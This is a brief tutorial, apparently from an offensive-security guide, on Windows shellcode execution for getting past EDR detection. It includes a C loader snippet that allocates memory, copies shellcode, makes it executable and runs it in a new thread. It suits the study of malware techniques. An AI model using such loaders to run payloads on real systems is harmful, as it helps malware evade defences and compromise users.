Shellcode Execution
Shellcode execution is a very broad topic. There are a lot of different techniques on how to do it, and we won't present all of them here. Actually the vast majority of ways to execte a shellcode boil down to a few basic steps. The various techniques differ in the way these steps are executed, the WinAPI functions used, etc.
Basic steps to execute the shellcode:
- Allocate executable memory for the shellcode
- Write the shellcode to the allocated memory
- Execute the shellcode memory
The whole game is to perform all these necessary operations in such a way that the EDRs do not realize that they are dealing with malware. Various tricks are used for this purpose.
Basic technique
Below we will present one of the most basic techniques for making shellcode by creation of a local thread. This is just an example, this technique is very well known and detected by all EDRs, but it illustrates very well the basics of the whole process.
// 1. Allocate memory
PVOID shellcode_mem = VirtualAlloc(
NULL,
shellcode_size,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE // Using PAGE_EXECUTE_READWRITE is an indicator of malware
);
// 2. Copy original shellcode to the allocated memory
memcpy(shellcode_mem, SHELLCODE, shellcode_size);
// 3. Make memory executable
VirtualProtect(
shellcode_mem,
shellcode_size,
PAGE_EXECUTE_READWRITE,
NULL
);
// 4. Create a new thread and execute the shellcode memory
HANDLE thread = CreateThread(NULL, NULL, shellcode_mem, NULL, NULL, NULL);
// 5. Wait for the thread
WaitForSingleObject(thread, INFINITE);